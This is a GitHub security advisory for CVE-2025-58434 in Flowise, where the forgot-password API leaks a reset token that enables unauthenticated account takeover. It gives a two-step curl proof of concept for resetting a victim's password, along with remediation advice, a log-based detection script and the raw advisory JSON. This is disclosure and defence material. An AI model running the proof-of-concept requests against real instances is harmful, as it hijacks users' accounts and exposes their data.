ghsa-wgpv-6j63-x5ph
Vulnerability from github
Summary

The `forgot-password` endpoint in Flowise returns sensitive information, including a valid password reset `tempToken`, without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details

- The endpoint `/api/v1/account/forgot-password` accepts an email address as input.
- Instead of only sending a reset email, the API responds directly with sensitive user details, including:
  - User ID, name, email, hashed credential, status, timestamps.
  - A valid `tempToken` and its expiry, which is intended for password reset.
- This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account without any email verification or user interaction.
- Exploitation requires only the victim’s email address, which is often guessable or discoverable.
- Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.
PoC

1. Request a reset token for the victim

```bash
curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'
```

Response (201 Created):

```json
{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}
```

2. Use the exposed `tempToken` to reset the password

```bash
curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
    "user":{
      "email":"<victim@example.com>",
      "tempToken":"<redacted-tempToken>",
      "password":"NewSecurePassword123!"
    }
  }'
```

Expected Result: `200 OK`
The victim’s account password is reset, allowing full login.
Impact

- Type: Authentication bypass / Insecure direct object exposure.
- Impact:
  - Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
  - Applies to both Flowise Cloud and locally hosted/self-managed deployments.
  - Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
  - High likelihood of exploitation since no prior access or user interaction is required.
Recommended Remediation

- Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
- Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.
- Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
- Apply the same fixes to both cloud and self-hosted/local deployments.
- Log and monitor password reset requests for suspicious activity.
- Consider multi-factor verification for sensitive accounts.
Credit
⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).
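For the "log and monitor password reset requests" item, here is an added example of detection logic run over constructed log lines; it is not Flowise's code and the JSON-lines log format, field names (`ts`, `ip`, `path`, `status`, `email`) and thresholds are assumptions. Two heuristics are applied: one source requesting resets for many distinct accounts in a short window, and a successful reset-password call arriving from the same source only seconds after its forgot-password call, which is the shape a leaked-token reset takes because there is no email round-trip to wait for.

```javascript
// Added example, not Flowise's own code: scan API access logs for password-reset abuse.
// The JSON-lines log format, field names and thresholds are assumptions for this illustration.
const FORGOT_PATH = '/api/v1/account/forgot-password';
const RESET_PATH = '/api/v1/account/reset-password';

// Constructed sample log: one source requests resets for four accounts and resets one of them
// seconds later; a second source performs a single, ordinary reset minutes after its request.
const SAMPLE_LOG = [
  '{"ts":"2025-08-19T12:45:00Z","ip":"203.0.113.5","path":"/api/v1/account/forgot-password","status":201,"email":"admin@example.com"}',
  '{"ts":"2025-08-19T12:45:03Z","ip":"203.0.113.5","path":"/api/v1/account/forgot-password","status":201,"email":"ops@example.com"}',
  '{"ts":"2025-08-19T12:45:06Z","ip":"203.0.113.5","path":"/api/v1/account/forgot-password","status":201,"email":"dev@example.com"}',
  '{"ts":"2025-08-19T12:45:09Z","ip":"203.0.113.5","path":"/api/v1/account/forgot-password","status":201,"email":"ceo@example.com"}',
  '{"ts":"2025-08-19T12:45:11Z","ip":"203.0.113.5","path":"/api/v1/account/reset-password","status":200,"email":"admin@example.com"}',
  '{"ts":"2025-08-19T13:10:00Z","ip":"198.51.100.7","path":"/api/v1/account/forgot-password","status":201,"email":"bob@example.com"}',
  '{"ts":"2025-08-19T13:21:30Z","ip":"198.51.100.7","path":"/api/v1/account/reset-password","status":200,"email":"bob@example.com"}',
].join('\n');

function parseLog(text) {
  return text.split('\n').filter(Boolean)
    .map((line) => { const e = JSON.parse(line); return { ...e, t: Date.parse(e.ts) }; })
    .sort((a, b) => a.t - b.t);
}

// Returns a list of findings; an empty list means nothing matched.
function detectResetAbuse(text, opts = {}) {
  const windowMs = opts.windowMs ?? 10 * 60 * 1000;          // look-back for the burst rule
  const maxDistinctEmails = opts.maxDistinctEmails ?? 3;     // distinct targets per source per window
  const minResetDelayMs = opts.minResetDelayMs ?? 30 * 1000; // faster than a person reading email
  const events = parseLog(text);
  const findings = [];

  // Rule 1: one source asking for resets of many different accounts within the window
  // (enumeration or mass-reset behaviour). Sliding window over each source's requests.
  const forgotBySrc = new Map();
  for (const e of events) {
    if (e.path !== FORGOT_PATH) continue;
    if (!forgotBySrc.has(e.ip)) forgotBySrc.set(e.ip, []);
    forgotBySrc.get(e.ip).push(e);
  }
  for (const [ip, list] of forgotBySrc) {
    for (let i = 0; i < list.length; i++) {
      const emails = new Set();
      for (let j = i; j < list.length && list[j].t - list[i].t <= windowMs; j++) emails.add(list[j].email);
      if (emails.size >= maxDistinctEmails) {
        findings.push({ rule: 'reset-burst', ip, distinctEmails: emails.size, since: list[i].ts });
        break;
      }
    }
  }

  // Rule 2: a successful reset for an account from the same source only seconds after that
  // source's forgot-password call. With a token taken from the API response there is no
  // email round-trip, so the gap is suspiciously short.
  const lastForgot = new Map(); // "ip|email" -> time of the most recent forgot-password
  for (const e of events) {
    const key = `${e.ip}|${e.email}`;
    if (e.path === FORGOT_PATH) {
      lastForgot.set(key, e.t);
    } else if (e.path === RESET_PATH && e.status === 200 && lastForgot.has(key)) {
      const delayMs = e.t - lastForgot.get(key);
      if (delayMs < minResetDelayMs) findings.push({ rule: 'fast-reset', ip: e.ip, email: e.email, delayMs });
    }
  }
  return findings;
}
```

Both rules are heuristics to tune per deployment: a user who opens the email on the same device within a few seconds will trip the second rule at a 30-second threshold, and shared egress addresses inflate the first. On an unpatched instance the fast-reset pattern is the one worth alerting on immediately; after upgrading, a reset-burst finding still indicates enumeration attempts against the generic-response endpoint.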
```json
{
  "affected": [
    {
      "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.5" },
      "package": { "ecosystem": "npm", "name": "flowise" },
      "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.0.6" } ], "type": "ECOSYSTEM" } ]
    }
  ],
  "aliases": [ "CVE-2025-58434" ],
  "database_specific": {
    "cwe_ids": [ "CWE-306" ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-12T20:02:40Z",
    "nvd_published_at": "2025-09-12T18:15:34Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete **account takeover (ATO)**.\n\nThis vulnerability applies to **both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments** that expose the same API.\n\n**CVSS v3.1 Base Score:** **9.8 (Critical)**\n**Vector String:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n---\n\n### Details\n\n* The endpoint `/api/v1/account/forgot-password` accepts an email address as input.\n* Instead of only sending a reset email, the API **responds directly with sensitive user details**, including:\n\n * User ID, name, email, hashed credential, status, timestamps.\n * **A valid `tempToken` and its expiry**, which is intended for password reset.\n* This `tempToken` can then be reused immediately in the `/api/v1/account/reset-password` endpoint to reset the password of the targeted account **without any email verification** or user interaction.\n* Exploitation requires only the victim\u2019s email address, which is often guessable or discoverable.\n* Because the vulnerable endpoints exist in both **Flowise Cloud** and **local/self-hosted deployments**, any exposed instance is vulnerable to account takeover.\n\nThis effectively allows any unauthenticated attacker to **take over arbitrary accounts** (including admin or privileged accounts) by requesting a reset for their email.\n\n---\n\n### PoC\n\n1. **Request a reset token for the victim**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/forgot-password \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"user\":{\"email\":\"\u003cvictim@example.com\u003e\"}}\u0027\n```\n\n**Response (201 Created):**\n\n```json\n{\n \"user\": {\n \"id\": \"\u003credacted-uuid\u003e\",\n \"name\": \"\u003credacted\u003e\",\n \"email\": \"\u003cvictim@example.com\u003e\",\n \"credential\": \"\u003credacted-hash\u003e\",\n \"tempToken\": \"\u003credacted-tempToken\u003e\",\n \"tokenExpiry\": \"2025-08-19T13:00:33.834Z\",\n \"status\": \"active\"\n }\n}\n```\n\n2. **Use the exposed `tempToken` to reset the password**\n\n```bash\ncurl -i -X POST https://\u003ctarget\u003e/api/v1/account/reset-password \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\n \"user\":{\n \"email\":\"\u003cvictim@example.com\u003e\",\n \"tempToken\":\"\u003credacted-tempToken\u003e\",\n \"password\":\"NewSecurePassword123!\"\n }\n }\u0027\n```\n\n**Expected Result:** `200 OK`\nThe victim\u2019s account password is reset, allowing full login.\n\n---\n\n### Impact\n\n* **Type:** Authentication bypass / Insecure direct object exposure.\n* **Impact:**\n\n * Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.\n * Applies to **both Flowise Cloud and locally hosted/self-managed deployments**.\n * Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.\n * High likelihood of exploitation since no prior access or user interaction is required.\n\n---\n\n### Recommended Remediation\n\n* **Do not return reset tokens** or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.\n* Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration.\n* Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery).\n* Apply the same fixes to **both cloud and self-hosted/local deployments**.\n* Log and monitor password reset requests for suspicious activity.\n* Consider multi-factor verification for sensitive accounts.\n\n\nCredit\n\n---\n\n\u26a0\ufe0f This is a **Critical ATO vulnerability** because it allows attackers to compromise any account with only knowledge of an email address, and it applies to **all deployment models (cloud and local)**.\n\n---",
  "id": "GHSA-wgpv-6j63-x5ph",
  "modified": "2025-09-15T15:31:14Z",
  "published": "2025-09-12T20:02:40Z",
  "references": [
    { "type": "WEB", "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wgpv-6j63-x5ph" },
    { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58434" },
    { "type": "WEB", "url": "https://github.com/FlowiseAI/Flowise/commit/9e178d68873eb876073846433a596590d3d9c863" },
    { "type": "PACKAGE", "url": "https://github.com/FlowiseAI/Flowise" }
  ],
  "schema_version": "1.4.0",
  "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ],
  "summary": "Flowise Cloud and Local Deployments have Unauthenticated Password Reset Token Disclosure that Leads to Account Takeover"
}
```
Sightings

| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.